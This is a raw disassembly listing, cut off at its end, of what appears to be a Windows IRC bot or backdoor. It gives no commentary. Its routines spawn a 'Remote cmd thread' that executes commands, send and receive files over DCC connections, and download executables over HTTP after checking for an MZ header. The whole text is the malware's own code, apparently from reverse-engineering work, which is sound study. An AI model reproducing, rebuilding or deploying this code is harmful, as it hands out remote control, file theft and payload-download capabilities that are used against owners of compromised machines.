push 0
lea eax, [ebp+var_31C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_204]
push eax
push dword_41DDF4
call dword_417088 ; ReadFile
test eax, eax
jnz short loc_401D08
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401981+383�j
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401D22: ; CODE XREF: sub_401981+238�j
; sub_401981+291�j ...
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
locret_401D35: ; CODE XREF: sub_401981+67�j
; sub_401981+BB�j ...
leave
retn 4
sub_401981 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D39 proc near ; CODE XREF: sub_401D6E+AF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push dword_41DDF0
call dword_417068 ; WriteFile
test eax, eax
jnz short loc_401D69
xor eax, eax
jmp short locret_401D6C
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401D39+2A�j
push 1
pop eax
locret_401D6C: ; CODE XREF: sub_401D39+2E�j
leave
retn
sub_401D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D6E proc near ; CODE XREF: sub_40A9CF+14A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_401DA6
cmp [ebp+arg_4], 0
jnz short loc_401D8B
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401D8B: ; CODE XREF: sub_401D6E+16�j
push 0
push 0
push 0
push [ebp+arg_4]
push offset aOpen ; "open"
push 0
call dword_4171D0
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D6E+10�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401DBC
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401DBC: ; CODE XREF: sub_401D6E+4A�j
cmp [ebp+arg_4], 0
jz short loc_401DD9
push 200h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
loc_401DD9: ; CODE XREF: sub_401D6E+52�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_405F67
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push [ebp+var_4]
push offset sub_401981
call sub_4095A4
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_401E0B
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401D6E+99�j
push offset asc_418214 ; "\r\n"
push [ebp+arg_4]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_4]
call sub_401D39
pop ecx
test eax, eax
jnz short locret_401E36
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
locret_401E36: ; CODE XREF: sub_401D6E+18�j
; sub_401D6E+33�j ...
leave
retn
sub_401D6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E38 proc near ; DATA XREF: sub_4024F3+10B�o
var_614 = qword ptr -614h
var_60C = qword ptr -60Ch
var_604 = dword ptr -604h
var_600 = dword ptr -600h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = dword ptr -5E8h
var_5E4 = dword ptr -5E4h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5BB = byte ptr -5BBh
var_4B7 = byte ptr -4B7h
var_3B7 = byte ptr -3B7h
var_3AD = byte ptr -3ADh
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 604h
push 3D6h
push [ebp+arg_0]
lea eax, [ebp+var_5E0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_5BB]
push eax
call dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_5BB]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_5E4], eax
cmp [ebp+var_5E4], 0
jnz short loc_401EA3
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401E38+56�j
push 2710h
push 0
lea eax, [ebp+var_3B7]
push eax
lea eax, [ebp+var_4B7]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_401EEE
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EEE: ; CODE XREF: sub_401E38+95�j
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
mov eax, [ebp+var_5E0]
push dword ptr [eax]
push offset dword_418280
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_5E8], eax
and [ebp+var_204], 0
loc_401F2A: ; CODE XREF: sub_401E38:loc_401FD8�j
push 0
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+var_208]
call dword_417248 ; recv
mov [ebp+var_5F0], eax
cmp [ebp+var_5F0], 0
jz short loc_401F5F
cmp [ebp+var_5F0], 200h
jbe short loc_401F61
loc_401F5F: ; CODE XREF: sub_401E38+119�j
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: sub_401E38+125�j
mov eax, [ebp+var_204]
add eax, [ebp+var_5F0]
mov [ebp+var_204], eax
push [ebp+var_204]
call dword_41724C ; htonl
mov [ebp+var_5F4], eax
push 4
lea eax, [ebp+var_5F4]
push eax
push [ebp+var_208]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5E4]
push [ebp+var_5F0]
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B7C ; fwrite
add esp, 10h
cmp [ebp+var_5F0], 200h
jnb short loc_401FC7
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FC7: ; CODE XREF: sub_401E38+18B�j
mov eax, [ebp+var_5E0]
cmp dword ptr [eax+4], 0
jz short loc_401FD8
jmp loc_4020BC
; ---------------------------------------------------------------------------
loc_401FD8: ; CODE XREF: sub_401E38+199�j
jmp loc_401F2A
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401E38:loc_401F5F�j
; sub_401E38+18D�j
push [ebp+var_5E4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_5EC], eax
call sub_416B64 ; clock
cmp [ebp+var_5E8], eax
jnz short loc_402008
call sub_416B64 ; clock
dec eax
mov [ebp+var_5E8], eax
loc_402008: ; CODE XREF: sub_401E38+1C2�j
mov eax, [ebp+var_5EC]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_5F8], eax
fild [ebp+var_5F8]
fstp [ebp+var_5FC]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_600], eax
fild [ebp+var_600]
fdiv flt_417270
fdivr [ebp+var_5FC]
push ecx
push ecx
fstp [esp+60Ch+var_60C]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_604], eax
fild [ebp+var_604]
fdiv flt_417270
push ecx
push ecx
fstp [esp+614h+var_614]
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
push offset dword_418234
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 20h
loc_402094: ; CODE XREF: sub_401E38:loc_4020BC�j
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_208]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4020BE
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401E38+19B�j
jmp short loc_402094
; ---------------------------------------------------------------------------
locret_4020BE: ; CODE XREF: sub_401E38+66�j
; sub_401E38+B1�j ...
leave
retn 4
sub_401E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C2 proc near ; DATA XREF: sub_40260D+7C�o
var_A2C = qword ptr -0A2Ch
var_A24 = qword ptr -0A24h
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_9FC = dword ptr -9FCh
var_9F8 = dword ptr -9F8h
var_9F4 = dword ptr -9F4h
var_9F0 = byte ptr -9F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8BF = byte ptr -8BFh
var_8BE = byte ptr -8BEh
var_7BB = byte ptr -7BBh
var_618 = dword ptr -618h
var_614 = byte ptr -614h
var_210 = byte ptr -210h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A1Ch
push 2CCh
push [ebp+arg_0]
lea eax, [ebp+var_8E4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_8BF]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_9F8], eax
jmp short loc_40210D
; ---------------------------------------------------------------------------
loc_402100: ; CODE XREF: sub_4020C2:loc_40215E�j
mov eax, [ebp+var_9F8]
dec eax
mov [ebp+var_9F8], eax
loc_40210D: ; CODE XREF: sub_4020C2+3C�j
cmp [ebp+var_9F8], 0
jnz short loc_40212D
lea eax, [ebp+var_8BF]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40212D: ; CODE XREF: sub_4020C2+52�j
mov eax, [ebp+var_9F8]
movsx eax, [ebp+eax+var_8BF]
cmp eax, 5Ch
jnz short loc_40215E
mov eax, [ebp+var_9F8]
lea eax, [ebp+eax+var_8BE]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: sub_4020C2+7C�j
jmp short loc_402100
; ---------------------------------------------------------------------------
loc_402160: ; CODE XREF: sub_4020C2+69�j
; sub_4020C2+9A�j
mov [ebp+var_8E8], 10h
lea eax, [ebp+var_8E8]
push eax
lea eax, [ebp+var_10]
push eax
call sub_40CF25
push eax
call dword_417240 ; getsockname
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_614]
push eax
push [ebp+var_8E8]
lea eax, [ebp+var_10]
push eax
call dword_41DE58 ; getnameinfo
test eax, eax
jz short loc_4021BA
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_4020C2+E3�j
push 0Ah
lea eax, [ebp+var_A04]
push eax
push 1388h
push 400h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
lea eax, [ebp+var_A04]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_9FC], eax
cmp [ebp+var_9FC], 0
jnz short loc_40220F
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40220F: ; CODE XREF: sub_4020C2+138�j
push offset aRb ; "rb"
lea eax, [ebp+var_8BF]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8EC], eax
cmp [ebp+var_8EC], 0
jnz short loc_402250
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_402250: ; CODE XREF: sub_4020C2+16D�j
push 2
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_8EC]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_A08], eax
push 0
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
lea eax, [ebp+var_614]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset aDccSendSS ; "DCC Send %s (%s)"
lea eax, [ebp+var_8E0]
push eax
call sub_40D420
add esp, 10h
push [ebp+var_A08]
lea eax, [ebp+var_A04]
push eax
lea eax, [ebp+var_614]
push eax
call dword_417244 ; inet_addr
push eax
call dword_41724C ; htonl
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_418348
lea eax, [ebp+var_8E0]
push eax
call sub_40D4AB
add esp, 18h
push 0EA60h
push [ebp+var_9FC]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_618], eax
cmp [ebp+var_618], 0
jz short loc_40230F
cmp [ebp+var_618], 0FFFFFFFFh
jnz short loc_40233A
loc_40230F: ; CODE XREF: sub_4020C2+242�j
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_4020C2+24B�j
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
mov eax, [ebp+var_8E4]
push dword ptr [eax]
push offset dword_418320
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_9F4], eax
loc_40236F: ; CODE XREF: sub_4020C2:loc_40240D�j
push [ebp+var_8EC]
push 200h
push 1
lea eax, [ebp+var_210]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_A0C], eax
cmp [ebp+var_A0C], 0
jz short loc_4023A6
cmp [ebp+var_A0C], 200h
jbe short loc_4023A8
loc_4023A6: ; CODE XREF: sub_4020C2+2D6�j
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023A8: ; CODE XREF: sub_4020C2+2E2�j
push [ebp+var_A0C]
lea eax, [ebp+var_210]
push eax
push [ebp+var_618]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4023EE
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182F4
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 10h
jmp loc_4024ED
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_4020C2+303�j
cmp [ebp+var_A0C], 200h
jnb short loc_4023FC
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023FC: ; CODE XREF: sub_4020C2+336�j
mov eax, [ebp+var_8E4]
cmp dword ptr [eax+4], 0
jz short loc_40240D
jmp loc_4024EB
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: sub_4020C2+344�j
jmp loc_40236F
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: sub_4020C2:loc_4023A6�j
; sub_4020C2+338�j
call sub_416B64 ; clock
cmp [ebp+var_9F4], eax
jnz short loc_40242B
call sub_416B64 ; clock
dec eax
mov [ebp+var_9F4], eax
loc_40242B: ; CODE XREF: sub_4020C2+35B�j
mov eax, [ebp+var_A08]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_A10], eax
fild [ebp+var_A10]
fstp [ebp+var_A14]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A18], eax
fild [ebp+var_A18]
fdiv flt_417270
fdivr [ebp+var_A14]
push ecx
push ecx
fstp [esp+0A24h+var_A24]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A1C], eax
fild [ebp+var_A1C]
fdiv flt_417270
push ecx
push ecx
fstp [esp+0A2Ch+var_A2C]
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182B0
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 20h
loc_4024B7: ; CODE XREF: sub_4020C2:loc_4024EB�j
; sub_4020C2:loc_4024ED�j
push [ebp+var_618]
call sub_40538D
pop ecx
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4024EF
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: sub_4020C2+346�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_4024ED: ; CODE XREF: sub_4020C2+327�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
locret_4024EF: ; CODE XREF: sub_4020C2+F3�j
; sub_4020C2+148�j ...
leave
retn 4
sub_4020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_40D871+203�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_402511
cmp [ebp+arg_8], 0
jz short loc_402511
cmp [ebp+arg_C], 0
jz short loc_402511
cmp [ebp+arg_10], 0
jnz short loc_402516
loc_402511: ; CODE XREF: sub_4024F3+A�j
; sub_4024F3+10�j ...
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402516: ; CODE XREF: sub_4024F3+1C�j
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402531
cmp [ebp+var_8], 0FFFFh
jbe short loc_402536
loc_402531: ; CODE XREF: sub_4024F3+33�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402536: ; CODE XREF: sub_4024F3+3C�j
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402551
cmp [ebp+var_8], 40000000h
jbe short loc_402556
loc_402551: ; CODE XREF: sub_4024F3+53�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402556: ; CODE XREF: sub_4024F3+5C�j
push 3D6h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40256F
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_40256F: ; CODE XREF: sub_4024F3+75�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 100h
push [ebp+arg_C]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 6
push [ebp+arg_10]
mov eax, [ebp+var_4]
add eax, 229h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+22Fh], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 233h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41837C
push 0
push [ebp+var_4]
push offset sub_401E38
call sub_4095A4
add esp, 18h
locret_40260B: ; CODE XREF: sub_4024F3:loc_402511�j
; sub_4024F3:loc_402531�j ...
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260D proc near ; CODE XREF: sub_40A9CF+98E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jz short loc_40261D
cmp [ebp+arg_8], 0
jnz short loc_40261F
loc_40261D: ; CODE XREF: sub_40260D+8�j
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_40260D+E�j
push 2CCh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_402635
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_40260D+24�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4183A0
push 0
push [ebp+var_4]
push offset sub_4020C2
call sub_4095A4
add esp, 18h
locret_402696: ; CODE XREF: sub_40260D:loc_40261D�j
; sub_40260D+26�j
leave
retn
sub_40260D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402698 proc near ; CODE XREF: sub_402A32+5C9�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 420h
push 2710h
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_414], eax
cmp [ebp+var_414], 0
jnz short loc_4026CC
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4026CC: ; CODE XREF: sub_402698+2B�j
push [ebp+arg_8]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 401h
lea eax, [ebp+var_404]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_4053BF
add esp, 0Ch
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402745
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_402758
loc_402745: ; CODE XREF: sub_402698+A2�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_402758: ; CODE XREF: sub_402698+AB�j
push offset asc_4183EC ; "\r\n\r\n"
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_40278D
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40278D: ; CODE XREF: sub_402698+E0�j
mov eax, [ebp+var_410]
add eax, 4
mov [ebp+var_410], eax
push offset aContentLength ; "Content-Length: "
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_40C], eax
cmp [ebp+var_40C], 0
jz short loc_4027CC
mov eax, [ebp+var_40C]
cmp eax, [ebp+var_410]
jbe short loc_4027DF
loc_4027CC: ; CODE XREF: sub_402698+124�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4027DF: ; CODE XREF: sub_402698+132�j
and [ebp+var_41C], 0
lea eax, [ebp+var_41C]
push eax
push offset aContentLengthU ; "Content-Length: %u\r\n"
push [ebp+var_40C]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_408], eax
cmp [ebp+var_408], 1
jnz short loc_402818
cmp [ebp+var_41C], 0
jnz short loc_40282B
loc_402818: ; CODE XREF: sub_402698+175�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40282B: ; CODE XREF: sub_402698+17E�j
cmp [ebp+arg_1C], 0
jz short loc_40285D
cmp [ebp+var_41C], 2
jb short loc_40284A
mov eax, [ebp+var_410]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_40285D
loc_40284A: ; CODE XREF: sub_402698+1A0�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40285D: ; CODE XREF: sub_402698+197�j
; sub_402698+1B0�j
cmp [ebp+arg_18], 0
jz short loc_40286E
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_41C]
mov [eax], ecx
loc_40286E: ; CODE XREF: sub_402698+1C9�j
push [ebp+arg_14]
call sub_4167B9
pop ecx
test eax, eax
jz short loc_40288E
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40288E: ; CODE XREF: sub_402698+1E1�j
push offset dword_4182AC
push [ebp+arg_14]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jnz short loc_4028BF
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4028BF: ; CODE XREF: sub_402698+212�j
push [ebp+var_418]
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
push ecx
push 1
push [ebp+var_410]
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
mov eax, [ebp+var_41C]
sub eax, ecx
mov [ebp+var_41C], eax
loc_402910: ; CODE XREF: sub_402698:loc_402A1D�j
cmp [ebp+arg_20], 0
jz short loc_40293F
mov eax, [ebp+arg_20]
cmp dword ptr [eax+4], 0
jz short loc_40293F
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40293F: ; CODE XREF: sub_402698+27C�j
; sub_402698+285�j
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402976
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_40299E
loc_402976: ; CODE XREF: sub_402698+2D3�j
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push [ebp+arg_14]
call dword_4170AC ; DeleteFileA
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402698+2DC�j
mov eax, [ebp+var_420]
cmp eax, [ebp+var_41C]
jbe short loc_4029C8
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029C8: ; CODE XREF: sub_402698+312�j
push [ebp+var_418]
push [ebp+var_420]
push 1
lea eax, [ebp+var_404]
push eax
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_41C]
sub eax, [ebp+var_420]
mov [ebp+var_41C], eax
cmp [ebp+var_41C], 0
jnz short loc_402A1D
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_402A1D: ; CODE XREF: sub_402698+366�j
jmp loc_402910
; ---------------------------------------------------------------------------
locret_402A22: ; CODE XREF: sub_402698+2F�j
; sub_402698+BB�j ...
leave
retn
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: sub_402A32+625�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2B proc near ; CODE XREF: sub_402A32+673�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A32 proc near ; DATA XREF: sub_403260+BC�o
var_814 = qword ptr -814h
var_804 = qword ptr -804h
var_7FC = dword ptr -7FCh
var_7F8 = qword ptr -7F8h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = dword ptr -7E8h
